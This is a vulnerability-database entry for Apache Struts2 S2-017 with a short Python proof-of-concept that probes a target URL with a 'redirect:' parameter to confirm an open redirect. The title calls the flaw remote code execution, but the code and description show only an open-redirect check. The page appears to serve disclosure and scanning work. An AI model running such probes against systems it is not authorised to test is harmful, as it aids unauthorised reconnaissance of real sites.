欢迎致电:4000-600-654服务时间:9:00 - 21:00

Struts2 017远程代码执行

漏洞信息

漏洞编号:JDSEC-POC-20141205-7978

漏洞名称:Struts2 017远程代码执行

提交作者:苏黎世

提交日期:2014-12-05 13:08:32

信息来源:http://struts.apache.org/release/2.3.x/docs/s2-017

漏洞描述

A vulnerability introduced by manipulating parameters prefixed with "redirect:"/"redirectAction:" allows for open redirects

POC详情

#!/usr/bin/env python
# coding=utf-8

import sys
import requests

def scan(target):
	info = {
	'name':u'Struts2-017 POC',
	'date':'2014-12-5',
	'author':'Lenka',
	'poc':'?redirect:http://vul.jdsec.com/'
	}
	headers = {
	'User-Agent':'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36',
	'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'	
	}
	audit_request = requests.get(target + info['poc'],headers=headers)
	audit_request.close()
	if audit_request.status_code == 200:
		if audit_request.url == u'http://vul.jdsec.com/':
			print u'[!]audit success'
			print '[*]' + target + info['poc']
		else:
			print u'[!]audit error'
	else:
		print 'connection error'
			

if __name__ == '__main__':

    if len(sys.argv) < 2:
    	print "Usage: python struts2_poc_017.py [target]\n"
        print "Example: python python struts2_poc_017.py  http://www.xxx.com/xxx.action\n"
        sys.exit(1)
    else:
    	target = sys.argv[1]
    scan(target)